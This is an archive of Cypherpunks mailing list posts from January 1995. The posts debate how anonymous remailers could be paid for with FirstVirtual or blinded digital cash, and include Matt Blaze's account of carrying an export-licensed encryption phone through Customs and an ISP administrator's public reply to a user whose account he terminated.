As >both the FV and Digicash folks have pointed out many times, we have very >different technologies that fill very different requirements, it's not >an either/or choice. I think you could build interesting anonymous >remailers on each system, too. -- Nathaniel Try to bring up objections to a digicash-style system that are applicable to remailers. I agree that they are different technologies that fill different requirements, but it seems to me that the particular requirements of a remailer system are only met by a digicash/magic money style technology. I think an electronic cash system that will work with remailers, must satisfy these things: 1) You need to be able to enclose the "signifier" of the transaction inside encryption. Whether the "signifier" is the cash itself, or an agreement to make a transaction together with a billing number, or whatever, you need to be able to enclose it in a PGP (or other arbitrary PKE protocol) encrypted block. 2) The "signifier" of the transaction (which again might theoretically be the cash itself, or some kind of billing number) alone shouldn't be enough to reveal the identity of the anonymous user. Number two up there is what most of us _mean_ by "anonymous digital cash", and FV simply doesn't meet it. FV might be perfectly adequate in some circumstances, but it doesn't meet that requirement, and many of us aren't going to feel comfortable using a system to pay for remailer access (among other things, certainly, but remailer access is something that is worthless without anonymity) that doesn't fulfill that requirement. If the "signifier" alone can be used to determine who I am, even if it takes the collusion of FV and a remailer op, I'm not comfortable with that. Number One is necessary for the ecash protocol to work within the remailer framework effectively; I've got to send each remailer its payment within an "envelope" that no one else can penetrate.
The use of an ecash payment system which doesn't meet these two requirements can't help but _lessen_ the security of the current conglomeration of remailers. Which is unacceptable to me. Remailers should be trying to approach the goal of ensured secure anonymity, and requiring payment by an ecash system which doesn't meet those two requirements would seem to be retreating from that goal, in a rather difficult to reverse manner. From blancw at microsoft.com Fri Jan 6 13:51:51 1995 From: blancw at microsoft.com (Blanc Weber) Date: Fri, 6 Jan 95 13:51:51 PST Subject: Carol Anne - C'Punk Poster Person? Message-ID: <9501062152.AA05672@netmail2.microsoft.com> From: Dave It occurs to me that Carol's problem may well be of considerable interest to c'punks and free speechers everywhere. Not that I favor spam or its derivatives - but Cancelmoose and others define spam as *_50_* or more groups, esp. without crossposting. ........................................................... It occurs to me that Carol's problem is personal, that we don't know all of the details, that the sysadmin responsible is in contact with her and appears quite willing to communicate on the episode, to explain to her the reason for the action taken as well as being willing to provide to her opportunity to retrieve all of her email, etc. as well as to talk to her new provider and explain once again the details of the situation. If the sysadmin's action was the result of regulation, then it would be apropos for a wider range of interest, but it appears to be the decision of an individual sysadmin acting on his own prerogative. Objections could be sent to him personally, unless someone wanted to make him answer to the list for his judgement and decision, and spend a lot of time arguing with him about it.
Blanc From mab at research.att.com Fri Jan 6 13:56:39 1995 From: mab at research.att.com (Matt Blaze) Date: Fri, 6 Jan 95 13:56:39 PST Subject: My life as an international arms courier Message-ID: <9501062154.AA04543@merckx.info.att.com> Under an obscure provision of US law, devices and computer programs that use encryption techniques to hide information from prying eyes and ears are considered ``munitions'' and subject to the same rules that govern the international arms trade. In particular, taking such items out of this country requires the approval of the State Department, which decides whether exporting something might endanger national security. In the past, these restrictions were of little concern to the average citizen; encryption found most of its application in military and diplomatic communications equipment. Today, however, growing concern over electronic fraud and privacy means that encryption techniques are starting to find their way into more conventional commercial products like laptop computers and portable phones. Mostly to find out what the process was like, I recently applied for a temporary export license for a portable telephone encryption product that I wanted to take with me on a business trip to England and Belgium. The item in question is more properly called a ``telephone security device.'' This is a little box that scrambles telephone conversations to protect them against eavesdroppers; this sort of protection is sometimes important when discussing confidential business matters from faraway places. The particular model I bought was already approved for export; it employs a cipher algorithm that the government has already decided is not a threat to national security even should it fall into the hands of some rogue government. This model is aimed primarily, I presume, at international business travelers who want to communicate in a reasonably secure manner with their home offices in the states. 
In other words, a typical user buys two of them, leaving one at the home office and carrying the other when traveling abroad. The options that came with my device included a James Bond-ish looking acoustic coupler and handset to facilitate its connection to the hardwired phones that are still common in European hotel rooms. It turns out that there was recently some discussion in the government about exempting products like my secure phone from the licensing paperwork requirements. Unfortunately, however, this exemption never actually took effect. So even though the device I had was already approved for sale abroad, I still needed to get a temporary export license before I could take it with me. But I was assured that ``this is an easy, routine process''. Well, sure enough, about two weeks before I was to leave I got back my official US State Department ``license for the temporary export of unclassified defense articles''. So far, so good. From what I was able to figure out by reading the license (and having a few conversations with an export lawyer), I'm required to leave from an international airport with a Customs agent present (no problem there, although Customs is geared to arriving, rather than departing, travelers). At the airport, I'm supposed to fill out a form called a ``shipper's export declaration'' (SED) on which I have to declare that ``these commodities are authorized by the US government for export only to Belgium and the United Kingdom. They may not be resold, transshipped, or otherwise disposed of in any country, either in their original form or incorporated into other end-items without the prior written approval of the US Department of State''. Then I'm to present the SED and export license to a Customs official at the airport before I leave. The Customs officer is supposed to take my SED and endorse my license to show what I'm actually taking out of the country.
On the way back in, I'm supposed to ``declare'' my item at Customs (even though it was manufactured in the US) and show them my license, and they're supposed to endorse the license again as proof that I have, in fact, returned the ``defense article'' to the safety of the United States. The first hitch I ran into was that no one could actually tell me where I could get an SED form. But when I called Customs they assured me that this was no big deal. ``Just come by when you get to the airport and we stamp the license. I guess you can just fill out the SED there,'' they said. I made sure to get to the airport early anyway. Although there was moderately heavy traffic near the airport, I made it to JFK two and a half hours before my 10pm flight. I was flying United, which has their own terminal at JFK, so Customs has an office right there in the same building from which I was to depart (JFK is awful to get around, so I was glad for this). I checked in for my flight (and got upgraded to first class, which bolstered my expectation that everything was going to be really easy from here on). Then, luggage, license and phone in hand, I made my way downstairs to Customs, expecting to fill out the SED form and ``just have my license stamped'' as they had assured me earlier on the telephone. I explained my situation to the security guard who controls entry to the Customs area, and he led me to ``the back office'' without much argument or delay. The head uniformed Customs guy in the back office (which I think is the same office where they take the people suspected of being ``drug mules'' with cocaine-filled condoms in their stomachs) looked approachable enough. He had a sort of kindly, grandfatherly manner, and he was playing a video game on a laptop computer. I got the impression that most of the people he encounters are suspected drug smugglers, and he seemed pleased enough to be dealing with something a little different from the norm.
When I explained what I was doing he looked at me as if I had just announced that I was a citizen of Mars who hadn't even bothered to obtain a visa. He explained, carefully, that a) I really do need the SED form; b) not only that, I should have already filled it out, in duplicate; c) he doesn't have blank SED forms; d) he, like everyone else in the entire US government that I had spoken to, has no idea where one gets them from, but people must get them from somewhere; and e) it doesn't really matter, because I'm in the wrong place anyway. I asked him where the right place is. ``The cargo building, of course,'' he told me, patiently. I remembered the cargo building because I passed it in the taxi just as the traffic jam began, about half an hour before I got to the United terminal. The airport shuttle bus doesn't stop there. I'd have to call a taxi. ``But I think they're closed now, and even if they were open you'd never make it before your flight'' he helpfully added, saving me the trip. He also complimented me for going to the trouble to get the license. I must have looked hurt and confused. Eventually he called in some fellow in a suit who I presume to have been his boss. ``Are you the guy who wants to export the fancy gun?'' the fellow in the suit asked me. ``It's not a gun, it's a telephone,'' I responded, with a straight face. ``Why do you have a license to export a telephone?'' Good question, I thought. I explained about the export law and showed him the thing. He agreed that it looked pretty harmless. The fellow in the suit reiterated points a through e almost verbatim (do they rehearse for these things?) and explained that this isn't really their department, since my license was issued by the State Department, not Customs, and my situation doesn't come up very often because exports usually go via the cargo building. He'd love to help me, but the computer in which these things get entered is over in Cargo. ``That's how the records get made.
But you do have a valid license, which is nice.'' He also suggested that I would have had an easier time had I shipped the device instead of carrying it with me. I asked what I should do, given that my plane was scheduled to leave in less than an hour. Neither was sure, but the fellow in the suit seemed willing to leave it to the discretion of the uniformed guy. ``How does this thing work, anyway?'' he asked. I explained as best as I could, trying to make it sound as harmless as it is. ``You mean like that Clipper chip?'' he asked. At this point, given that he has a computer and knows something about the Clipper chip, I figured that maybe there was some hope of making my flight. Or maybe I was about to spend the night in jail. In my mind, I put it at about a 90:10 hope:jail ratio. Then he asked, ``Do you know about this stuff?'' So we chatted about computers and cryptography for a while. Finally, the two of them decided that it wouldn't really hurt for them to just sign the form as long as I promised to call my lawyer and get the SED situation straightened out ASAP. They assured me that I won't be arrested or have any other trouble upon my return. I made my flight, validated license in hand. An aside: Throughout my trip, I discovered an interesting thing about the phone and the various options I was carrying with it. Under X-ray examination, it looks just like some kind of bomb. (I suspect it was the coiled handset cords). Every time I went through a security checkpoint, I had to dig the thing out of my luggage and show it to the guard. I almost missed the new ``Eurostar'' chunnel train (3hrs 15mins nonstop from London to Brussels, airport-style checkin and security) as the guards were trying to figure out whether my telephone was likely to explode. Coming back to the US was less eventful, though it did take me an extra hour or so to get through Customs.
Expecting a bit of a hassle I didn't check any luggage and made sure to be the first person from my flight to reach the Customs line. The inspector was ready to wordlessly accept my declaration form and send me on my way when I opened my mouth and explained that I needed to get an export license stamped. That was obviously a new one for him. He finally decided that this had to be handled by something called the ``Ships Office''. I was sent to an unoccupied back room (a different back room from before) and told to wait. I thought about the recent Customs experiences of Phil Zimmermann. (Zimmermann, the author of a popular computer encryption program, was recently detained, questioned and searched by Customs officials investigating whether he violated the same regulations I was trying so hard to follow.) After about half an hour, an officer came in and asked me what I needed. I explained about my export license that had to be endorsed. She just shrugged and told me that she had to ``process the flight'' first. As best as I could tell, her job was to clear the airplane itself through Customs, that being, technically speaking, a very expensive import. It would take a little while. She was pleasant enough, though, and at least didn't look at me as if she intended to send me to jail or have me strip searched. Finally, she finished with the plane and asked me for my form. She studied it carefully, obviously never having seen one before, and eventually asked me what, exactly, she was supposed to do. I explained that I had never actually gone through this process before but I understood that she's supposed to record the fact that I was re-importing the device and stamp my license somewhere. She told me that she didn't know of any place for her to record this. After some discussion, we agreed that the best thing to do was to make a Xerox copy of my license and arrange for it to go wherever it had to go later. She stamped the back of the license and sent me on my way. 
It was a little over an hour after I first reached the Customs desk. My conclusion from all this is that it just isn't possible for an individual traveler to follow all the rules. Even having gone through the process now, I still have no idea how to obtain, let alone file, the proper forms, even for a device that's already been determined to be exportable. The export of export-controlled items is ordinarily handled by cargo shipment, not by hand carrying by travelers, and the system is simply not geared to deal with exceptions. Technically speaking, everyone with a laptop disk encryption program who travels abroad is in violation of the law, but since no one actually knows or checks, no mechanism exists to deal with those who want to follow the rules. While (fortunately) everyone I dealt with was sympathetic, no one in the government who I spoke with was able to actually help me follow the rules. I was permitted to leave and come back only because everyone involved eventually recognized that my telephone was pretty harmless, that my intentions were good, and that the best thing to do was be flexible. If anyone had taken a hard line and tried to enforce the letter of the law, I simply wouldn't have been able to take the thing with me, even with my license. Had I just put my telephone in my suitcase without telling anyone instead of calling attention to myself by trying to follow the rules, chances are no one would have noticed or cared. Unfortunately, however, these absurd rules carry the full force of law, and one ignores them only at the risk of being prosecuted for international arms trafficking. While it may seem far-fetched to imagine US citizens prosecuted as arms smugglers simply for carrying ordinary business products in their luggage, the law as written allows the government to do just that. 
At the same time, anyone who is aware of and who tries to follow the regulations is made to jump through pointless hoops that are so obscure that even the people charged with enforcing them don't know quite what to make of them. Copyright 1995 by Matt Blaze. All rights reserved. Electronic redistribution permitted provided this article is reproduced in its entirety.
From dcwill at python.ee.unr.edu Fri Jan 6 14:12:05 1995 From: dcwill at python.ee.unr.edu (Dr. D.C. Williams) Date: Fri, 6 Jan 95 14:12:05 PST Subject: Remailer Abuse Message-ID: <199501062217.RAA29043@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- > >Why? Why wouldn't the FV remailers use settlements? At the end of > >the month, everyone settles accounts in re who gets what fraction of > >what. No logs are needed other than counters. > Oh, you're suggesting that I'd only actually pay the first remailer on my > chain, and at the end of the month he'd pay some of the money I (and > others) paid him to all of the other remailers he transacted with over the > month? Way too complicated . . . Why not establish a system where only the first remailer is paid and all subsequent remailers agree to accept traffic from other remailers without compensation? Assuming that first remailer use is or would be somewhat distributed, the net from each remailer would approach the same figure reached by endlessly confusing cross-payments (A pays B, C, and D, B pays A, C, and D, etc.). Only non-remailed access would be subject to a fee. Operators with the best net. reputations and those whose remailers are especially full featured or prompt will likely receive more use as "entry" remailers; this is good capitalism which should not only increase their number but improve the state of remailers in general. If someone wants to establish a remailer that will join the existing mesh of remailers, it will have to accept messages from others gratis if it wants such access to the rest of them. 
Its compensation would be derived from initial traffic. Maybe this would also encourage operators to beat the bushes for traffic, which would also be a Good Thing. =D.C. Williams - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw3BayoZzwIn1bdtAQECegGAjSdkX8YYygLJkk1K/Sr6A84QpdNOXbUq uuWxqbSg+6T3Tac+GKdxdNw2SqdExIrV =z/ms -----END PGP SIGNATURE-----
From drechsau at winternet.com Fri Jan 6 14:12:55 1995 From: drechsau at winternet.com (Mike Horwath) Date: Fri, 6 Jan 95 14:12:55 PST Subject: Files and mail In-Reply-To: Message-ID: [This is hopefully going to be my only message on this matter, questions or comments, just reply to me directly] > A written reply will suffice. > You have my permission to make all of my files world readable. > You can put them in the ftp site. Since you are posting this to so many people, they can all see my reply. And this is a written reply :) > Upon receipt of notice, they will be removed within 24 hours, > and you will receive a signed PGP statement with the new key, > stating that the files have been removed. Other Winternet users have > already gone to my defense, and copied all of the world readable > material anyway. And the whole account might as well be, too. Fine, when I have things packed up, they will be moved and you will be notified. > Please do not forward any mail here. You will better serve yourself > bouncing the letter back to the sender and informing them of my new > address. If I find forwarded mail in my mailbox, I will print hard > copies and visit the Attorney General's Office and file a complaint > under the Stalking laws of the State of Minnesota. You can either take the alias in my alias database or have no forwarding address left, that is your choice. 
We are courteous enough to forward for you, take it or leave it. And stalking laws? I don't think so. There is a difference in notification and stalking and my email to you is far from stalking. > And please...deactivate my WWW pages. I was astounded to find out > that during the suspension, they continued to remain active, as I > learned in the office Wednesday. That was (and still is) stealing my > net.web.goodwill, and creating a falsehood amongst other users. They were left there because they are of use to the 'net and until I could hear from you what you wanted done with your files, there was no need to remove the WWW pages or your account. Now that we have your decision, everything will be removed. And stealing? You had them up for public consumption for many weeks. Did everyone who touched your page steal then? So, no, no advantage was taken by us via your WWW pages. > I spent six full hours making a personal appearance, at great > personal expense, to the Winternet Office to resolve the situation. Great personal expense? This is going to be fun. I don't think harassing Chad (my intern) or Doug (my roommate) for 6 full hours a very nice thing to do at all. If you had wanted to meet me there, you could have had one of them call me, or if they did not have the number for where I was at that day (which happened to be my first complete day off in a few weeks), you could have dropped me email stating you were at the office to discuss this. I was only 10 minutes away at a friends house to escape work. I am pretty sure they told you I was taking a day off after they found out from me. I was going to be in, I decided to rest instead. So sue me for it. No Carol Anne, you did not have any 'great personal expense', what you did do was impose yourself on two people for 6 hours. You also then used our basic login on our console machines, which is there for when people come to visit, to post messages to UseNet and to send and receive email. Not very nice now is it? 
When service was suspended, it meant all service, not just your account on the main machines. Talk about net.good.will...you stole service after it was suspended. > My original reply still sits in suspended composition in my mailer. I > wasted not a nano-second in preparing my reply to the posting. In legal > point of fact, the poster is violation of Minnesota State Law. He has > no legal jurisdiction whatsoever. What are you talking about now? I hope you don't think I am taking legal action for something, because that would be just funny to hear. Your account was terminated for a breach in our AUP, not because you caused me or Winternet harm. > I did not take days to "investigate", nor cite that other things such as > "my machines being hacked" and "I'll do it when I'm ready to do it,". First day, Monday, when I suspended your account, you did not even feel it was reasonable to call me when I had written a message to your screen explaining that we needed to talk. Tuesday, after being up for 20+ hours and getting a couple hours sleep, you call and harass me at home even more about the status of your account. I told you I wanted to investigate these instances and that I did not have the time because I was dealing with some hackers who had tried to break in. Again, sue me, this time for being tired. Wednesday, I was going to be into work, which you assumed I would be, but did not bother to call to make sure I was around. I decided I was going to take that day off I had been trying to take and did NOT find out you were in the office until late afternoon Wed. I asked Chad and Doug why you were there, and they said they did not know. If you had wanted to see me to talk about this, you should have spoken up. The machine being down was not used as an excuse, but it is hard to operate like we used to with only one user machine. This is a piece of stress on me, which was never taken out on you or on any other user. > I was a simple complaint. It had no validity. 
Crossposting an article to > .1% of the Usenet News Groups does not by the very statistic constitute > spam. (And I own two shares of Hormel Corp, so I do know what SPAM (tm) is. What you consider spamming, and what others do, is two different things. I explained my views, you have seen our AUP, and it was in my judgement, and later, after talking with my peers, their judgement, that things had gone too far. Should I also bring to light your unsolicited mailings you did to users on Winternet and others out to the 'net? Remember those? Something about selling web pages from your account, which I had told you I would rather you did not do, very politely I might add. Or what about the net cash mass mailing you did to people? That is 2 counts in 2 days (notified on Monday, early, of the spamming, notified on Wed of the mass unsolicited mailings). Sorry, someone had to put their foot down, and it happened to be us. > The crossposting wasn't wasting resources. It was inappropriate for the groups that you posted to. > It is of no one's concern the actual groups posted. It is when others have to read it. > They have the right and ability to respond. And they did, both to you, you have stated, and to me, as the admin of Winternet. > I asked for no money. I did not stand to profit by the posting. That doesn't matter, it was still inappropriate to post this message to the groups you posted to. > The person who started the whole thing was pretty heavily chastised, > by the readers of his own news group. Huh? > A fast "K" was all that any individual needed for this article. Uhuh, we could have done that for C&S also, but it would not have helped. > No, Mr. Horwath, you are "way out-of-bounds" this time. > And as the time chronology unveils itself, I am sure that > will be shown to be a very truthful, factual statement. Sorry Carol Anne, but this is a system I administer and I use the AUP to protect all of us across the 'net. This was not an attack against you. 
You were not judged unfairly. What you did was break our agreement and for this, you lost your service. Also, you hadn't paid for your account for over 10 weeks, so why are you bitching so much anyway? We had talked about the winternet t-shirts and how we would use the work you did and the monies you would receive as payment. Well, no t-shirts have gone out and at this time, I will be cancelling all orders for them and will redesign them and have them produced externally to what you have done. This is what happens when you hold something over someones head. > Dangerous precedents were set here. I will not rest until the > whole of the Internet knows and is aware of the situation. Then spam again, Carol Anne. > Signed > Carol Anne Braddock > Friday January 6th, 1995 9:40 A.M. > On Fri, 6 Jan 1995, Mike Horwath wrote: > > > You are welcome to your files and mail, I will pack everything up for > > you as you left it, including your FTP area. > > > > I expect you to try to reach me today in the afternoon at my office and > > I will fully explain why your account was deleted, with full detail as > > to why. > > > > I do appreciate the work you did on the shirts for Winternet. I don't > > appreciate the harassment you have already tried to bring upon me. > > > > When we talk, I think you might understand why this was done. If you do > > not, then I feel bad, as I must then not be making myself clear. But > > no matter what, this was policy that you chose to break even after I > > had talked to you about it. More on this when we talk. > > > > Good luck at your new provider, Larry Leone is an old user of mine and > > seems to be a good guy, even if a little quiet on the newsgroups :) > > > > A copy of this letter is also going to your new admin so that he knows > > what is going on. > > > > Larry, Carol Anne was using about 11.5MB of disk that will be moving > > over from Winternet to MM. > > > > Also, how have you been anyway? Been awhile since I saw you. 
Oh, and > > could you install identd on your system? Get back to me on anything, > > or with questions. > > > > -- > > Mike Horwath IRC: Drechsau LIFE: Lover drechsau at winternet.com > > Winternet: info at winternet.com root at jacobs.mn.org <- Linux! > > Twin Cities area Internet Access: 612-941-9177 for more info > > Founding member of Minnesota Coalition for Internet Accessibility [all previously included messages left intact] -- Mike Horwath IRC: Drechsau LIFE: Lover drechsau at winternet.com Winternet: info at winternet.com root at jacobs.mn.org <- Linux! Twin Cities area Internet Access: 612-941-9177 for more info Founding member of Minnesota Coalition for Internet Accessibility From jamesd at netcom.com Fri Jan 6 14:19:53 1995 From: jamesd at netcom.com (James A. Donald) Date: Fri, 6 Jan 95 14:19:53 PST Subject: for-pay remailers and FV (Was Re: Remailer Abuse) In-Reply-To: Message-ID: On Fri, 6 Jan 1995, Jonathan Rochkind wrote: > Hmm. Maybe I don't completely understand how this is going to work, but > won't _every_ remailer in the chain need to know your FV billing account? First remailer knows you and your FV billing account. Charges you its own fee and the fee for all for profit remailers in the list. (The envelope states what this fee is going to be) Second remailer charges first remailer. Third remailer charges second remailer. If the postage on the envelope is insufficient to cover all the for profit remailers the message passes through, it gets bounced or dropped. In principle it could work, But blinded digital cash makes it a lot easier. (blinded postage stamps) I would not try to implement it. Too much like hard work, for an unnecessarily complex solution. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. 
jamesd at netcom.com From cactus at seabsd.hks.net Fri Jan 6 14:33:37 1995 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Fri, 6 Jan 95 14:33:37 PST Subject: public vs. private replies Message-ID: <199501062238.RAA29242@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- In article <199501060807.DAA22166 at bb.hks.net>, L. McCarthy wrote: >Tim May writes: >> In my opinion, having personal access >> to past posts is several orders of magnitude more important than >> having MIDI-MIME JPEG-II TeX players [...] > >It takes more disk space from one's personal quota, though (for those who >suffer under such restrictions). :[ All posts to cypherpunks since June '94 are available by ftp from ftp.hks.net:/cypherpunks/nntp/cypherpunks. They are also available via nntp from nntp.hks.net:hks.lists.cypherpunks. I'd be glad to put a search engine of some sort on them, either by Web or by mailserver, if someone can suggest a reasonable way to index the whole lot. - - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLw2LTRNhgovrPB7dAQEDNwP/QTydu0Tp68ytNupes18WU+uv159GJJfE Wy+3iLxj+9rbPJwEKBZlXqhkfV7pf4nK9wNwiwNR4ZF13zpCAljWPhw3BEgNM4Xj Ity2GWLb8s7PBMplc+ggTQ4LowMYGqoO/e1pBWH3joFCuv11owkf+ZmbvTSZgU7h l07wq41l2L0= =Ao+S - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw3GJCoZzwIn1bdtAQFdVAF8DB7xxjzPgHNj2Eil0zEuLKj8SofCLFAs HBdXBN2fFjT5mNwnKh5a4T1R1Dv0Zp/c =6bFr -----END PGP SIGNATURE-----
From jrochkin at cs.oberlin.edu Fri Jan 6 14:40:13 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Fri, 6 Jan 95 14:40:13 PST Subject: Remailer Abuse Message-ID: <199501062245.RAA29327@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- At 5:10 PM 01/06/95, Dr. D.C. Williams wrote: [suggestion that only the first remailer would get paid, with justification for that.] >Operators with the best net. reputations and those whose remailers are >especially full featured or prompt will likely receive more use as >"entry" remailers; this is good capitalism which should not only increase >their number but improve the state of remailers in general. If someone >wants to establish a remailer that will join the existing mesh of remailers, >it will have to accept messages from others gratis if it wants such access >to the rest of them. Its compensation would be derived from initial traffic. Yeah, that does seem possible. One thing to keep in mind, though, is that it's really the _last_ remailer in the chain that's taking the most heat, and it would be nice if they got paid. There's also an issue of some remailers refusing to be last in the chain, so they don't expose themselves so much. So the remailers which _did_ agree to be last in the chain would obviously get used for this purpose, while the others wouldn't, but they wouldn't get any more money for it. They might even get less, since most people probably don't use the same remailer twice in a chain, so the ones agreeing to be last are hardly ever going to be first. That seems undesirable. Ideally, the forces of capitalism would work on the last remailer on the chain, rather than (or in addition to) the first, to increase the number of remailers willing to do this. 
All this goes triple for mail-to-news remailers, since that poses even more exposure to heat, and it would be nice if ops were compensated for. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw3H8yoZzwIn1bdtAQHFWwGAqDhDUgU4+I4wLsqR8AwHEm09E9lqVjCX IcKjz280k1pK3MLaOMTCueXVUaZCam6u =4Wi5 -----END PGP SIGNATURE-----
From nsb at nsb.fv.com Fri Jan 6 14:45:36 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Fri, 6 Jan 95 14:45:36 PST Subject: for-pay remailers and FV (Was Re: Remailer Abuse) In-Reply-To: <4715.789430801.1@nsb.fv.com> Message-ID: Excerpts from fv: 6-Jan-95 Re: for-pay remailers and F.. "James A. Donald"@netcom (1127*) > On Fri, 6 Jan 1995, Jonathan Rochkind wrote: > > Hmm. Maybe I don't completely understand how this is going to work, but > > won't _every_ remailer in the chain need to know your FV billing account? > First remailer knows you and your FV billing account. Charges you > its own fee and the fee for all for profit remailers in the list. > (The envelope states what this fee is going to be) > Second remailer charges first remailer. > Third remailer charges second remailer. > If the postage on the envelope is insufficient to cover all > the for profit remailers the message passes through, it gets > bounced or dropped. > In principle it could work, Yes, I think you've probably just identified a *second* way it could work. I agree it's awfully complex, though. I'd prefer my consortium approach, but it's nice to see that multiple models are possible. 
-- Nathaniel
From nsb at nsb.fv.com Fri Jan 6 14:45:49 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Fri, 6 Jan 95 14:45:49 PST Subject: for-pay remailers and FV (Was Re: Remailer Abuse) In-Reply-To: <2292.789427808.1@nsb.fv.com> Message-ID: Excerpts from fv: 6-Jan-95 for-pay remailers and FV (W.. jrochkin at cs.oberlin.edu (4416*) > Hmm. Maybe I don't completely understand how this is going to work, but > won't _every_ remailer in the chain need to know your FV billing account? > How would the rest of them charge via FV without knowing your billing > account? What Russell was suggesting (I think), was that only the first > would bill via FV directly, so only the first would need to know your > billing account, and then he'd settle up with the others at the end of the > month. (A particular variation of that scheme is what you mentioned later > in your message, and I'll get to that). The latter is what I was proposing. Only the first one would charge via FV, but the other ones would form a "closed system" that you could only get into by going through one that charged. > But assuming that every remailer along the chain _was_ charging via FV, I > fail to see how only the last one would need your billing account; seems to > me they all would, and thus any one could collude with FV to violate your > anonymity. That's not my assumption. I think you may have misread my mail -- I *agree* with you on this point. Sorry if I was unclear! > The > remailer operators still have to have an organization and remain in close > contact, which I am uncomfortable with because it seems to make collusion > more likely. As I said, it all depends on your level of paranoia.... I tend to think that in such an organization, where the primary "product" is privacy, each member would tend to watch all the other members like hawks, eager to publicize any instance of the other guy not being sufficiently zealous in protecting privacy. 
(Of course, I'm assuming that people like *you* will be running these services, i.e. people even more paranoid about privacy than me.) > And it's still difficult to intermix for-pay and free remailers > within your chain, or even just for-pay remailers from several different > consortiums. I think this is wrong. In my model, each consortium model has two, a for-pay and a for-free. Anyone can send to a for-pay, but only a consortium remailer can send to a for-free. Not that complicated, really. > [The > consortium, as far as I can tell, would also find it rather difficult to > charge more for a longer chain, I can't think of any way for them to charge > anything except a uniform amount regardless of length of chain, unless you > give the first remailer a way to tell the length of your chain, which is > undesirable. I'm not sure if this is a problem.] To my mind, that's not a bug, it's a feature. The consortium is charging you a set fee for privacy, and you get to decide how many hops are required to have a level of privacy you trust. > And this level of paranoia would be perfectly well served by a Julf/penet > style remailer, which _would_ work well with an FV-payment system, as I > agreed before. The cypherpunks chained remailernet system as a whole is > overkill for your paranoia needs, but apparently not for the needs of > those who use it over Julf's. It appears to me, that an FV-style payment > scheme can't be added to the cypherpunks chained remailer system without > dropping its security to the level of Julf's. Which might be good enough > for you, but not good enough for me, or presumably for anyone else that > uses cypherpunks remailers. This is true of the scheme that I said I would be satisfied with (one remailer + FV), but not true, I think, of the "overkill" scheme, which was the consortium. > [Do you understand how cypherpunks remailers work, and the difference > between them and a julf/penet style remailer? 
Do you understand how > encryption is used in a cypherpunks-style remailer chain to make it so each > individual remailer only knows the next remailer along the chain, and not > the entire rest of the chain?] Well, I *think* I do, though I may be suffering from a bit of dilettantism here -- I'm certainly no expert in cryptography, but I think I understand the concepts involved. We haven't even gotten into the effect of encryption yet -- so far, we've just been talking, I thought, about untraceability. But as far as I can see, there's no reason that the consortium pay-only-at-entry scheme couldn't work with encrypted remailers. Am I confused? Couldn't you use the same cryptographic chain as is currently used, where all the inner entries in the chain are free crypto-remailers open only to other consortium remailers, but in which the outer encrypted message had the FV payment attached, which gained it entry to the remailer pool? > Try to bring up objections to a digicash-style system that are applicable > to remailers. I agree that they are different technologies that fill > different requirements, but it seems to me that the particular requirements > of a remailer system are only met by a digicash/magic money style > technology. Again, I think you mis-read me. I haven't (nor do I care to) spent a lot of time thinking about how to do remailers at all, let alone with digicash. What I was referring to was the basic objections that come from using a digital cash scheme in the first place. > I think an electronic cash system that will work with remailers, must > satisfy these things: > 1) You need to be able to enclose the "signifier" of the transaction inside > encryption. Whether the "signifier" is the cash itself, or an agreement to > make a transaction together with a billing number, or whatever, you need to > be able to enclose it in a PGP (or other arbitrary PKE protocol) encrypted > block. 
> 2) The "signifier" of the transaction (which again might theoretically be > the cash itself, or some kind of billing number) alone shouldn't be enough > to reveal the identity of the anonymous user. I agree that FV doesn't meet the above requirements, but I don't see why they're necessary for remailers. In the consortium scheme I'd proposed, the only thing that could ever be proven about you would be that you had used a remailer. Now, if the message was not encrypted, your anonymity could be broken by collusion of FV and the "entry" remailer. But if the cypherpunks style cryptographic chain was used, i.e. if the contents (including an inner envelope that said who you really sent it to) were encrypted, nothing more would ever be derivable without the collusion of everyone in the chain, and even then it would only be derivable if certain records were kept. All I'm claiming is that it's do-able using the FV payment system. I'm not going to do it myself because I don't personally feel that this level of untraceability is EVER legitimately necessary..... -- Nathaniel
From rah at shipwright.com Fri Jan 6 15:10:09 1995 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 6 Jan 95 15:10:09 PST Subject: floating point crypto? Message-ID: At 6:51 PM 1/5/95, Timothy C. May wrote: >Robert H. has asked that we reply in e-mail to him, to avoid >"cluttering the list more than I already have...," but the logic of >this is faulty. The few lines of a response such as this one, or even >of several such responses, are as nothing compared to dozens or more >people sifting their own archives so they can each independently send >Robert what they find. Hence my public reply. Got that right. No one can be more chagrined than I about this, because I've seen it happen. I remember Way Back in Ancient History (1985) when someone who couldn't remember the name of the movie posted the plot to "Silent Running" to net.sf(?), and asked for e-mail answers, so it "wouldn't clog the newsgroup". 
